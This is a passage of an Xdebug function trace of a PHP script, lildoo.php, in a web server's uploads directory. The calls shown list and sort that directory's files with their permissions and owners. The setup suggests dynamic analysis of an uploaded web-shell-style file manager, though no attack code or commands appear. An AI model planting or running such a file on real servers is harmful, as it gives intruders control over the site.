5	176	0	0.010886	800200	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'File'	2	'UTF-8'
5	176	1	0.010901	800472
5	176	R			'File'
4	175	1	0.010914	800360
4	175	R			'File'
4	177	0	0.010927	800264	word	1		/var/www/html/uploads/lildoo.php	1468	1	'directory'
5	178	0	0.010950	800264	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'Directory'	2	'UTF-8'
5	178	1	0.010966	800536
5	178	R			'Directory'
4	177	1	0.010980	800424
4	177	R			'Directory'
4	179	0	0.010994	800424	word	1		/var/www/html/uploads/lildoo.php	1471	1	'create'
5	180	0	0.011006	800424	htmlentities	0		/var/www/html/uploads/lildoo.php	1599	3	'create'	2	'UTF-8'
5	180	1	0.011021	800696
5	180	R			'create'
4	179	1	0.011039	800584
4	179	R			'create'
3	174	1	0.011058	800040
3	181	0	0.011068	800040	sortlist	1		/var/www/html/uploads/lildoo.php	1213	3	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]	'filename'	FALSE
3		A						/var/www/html/uploads/lildoo.php	907	$dirs = []
3		A						/var/www/html/uploads/lildoo.php	908	$files = []
3		A						/var/www/html/uploads/lildoo.php	910	$i = 0
4	182	0	0.011205	800040	sizeof	0		/var/www/html/uploads/lildoo.php	910	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	182	1	0.011278	800072
4	182	R			6
3		A						/var/www/html/uploads/lildoo.php	911	$dirs[] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/lildoo.php	910	$i++
4	183	0	0.011330	800416	sizeof	0		/var/www/html/uploads/lildoo.php	910	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	183	1	0.011397	800448
4	183	R			6
3		A						/var/www/html/uploads/lildoo.php	912	$files[] = ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
3		A						/var/www/html/uploads/lildoo.php	910	$i++
4	184	0	0.011447	800792	sizeof	0		/var/www/html/uploads/lildoo.php	910	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	184	1	0.011513	800824
4	184	R			6
3		A						/var/www/html/uploads/lildoo.php	911	$dirs[] = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/lildoo.php	910	$i++
4	185	0	0.011562	800792	sizeof	0		/var/www/html/uploads/lildoo.php	910	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	185	1	0.011628	800824
4	185	R			6
3		A						/var/www/html/uploads/lildoo.php	912	$files[] = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/lildoo.php	910	$i++
4	186	0	0.011685	800792	sizeof	0		/var/www/html/uploads/lildoo.php	910	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	186	1	0.011751	800824
4	186	R			6
3		A						/var/www/html/uploads/lildoo.php	911	$dirs[] = ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/lildoo.php	910	$i++
4	187	0	0.011799	800792	sizeof	0		/var/www/html/uploads/lildoo.php	910	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	187	1	0.011865	800824
4	187	R			6
3		A						/var/www/html/uploads/lildoo.php	912	$files[] = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/lildoo.php	910	$i++
4	188	0	0.011914	800792	sizeof	0		/var/www/html/uploads/lildoo.php	910	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'lildoo.php', 'path' => '/var/www/html/uploads/lildoo.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	188	1	0.011979	800824
4	188	R			6
4	189	0	0.011993	800816	sizeof	0		/var/www/html/uploads/lildoo.php	915	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
4	189	1	0.012037	800848
4	189	R			3
4	190	0	0.012050	800816	quicksort	1		/var/www/html/uploads/lildoo.php	915	4	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	0	2	'filename'
5	191	0	0.012096	800816	floor	0		/var/www/html/uploads/lildoo.php	929	1	1
5	191	1	0.012110	800848
5	191	R			1
4		A						/var/www/html/uploads/lildoo.php	929	$cmp = '.'
4		A						/var/www/html/uploads/lildoo.php	931	$l = 0
4		A						/var/www/html/uploads/lildoo.php	932	$r = 2
4		A						/var/www/html/uploads/lildoo.php	937	$r--
4		A						/var/www/html/uploads/lildoo.php	941	$tmp = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/lildoo.php	942	$array[0] = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676257694, 'atime' => 1676257694, 'ctime' => 1676257694, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
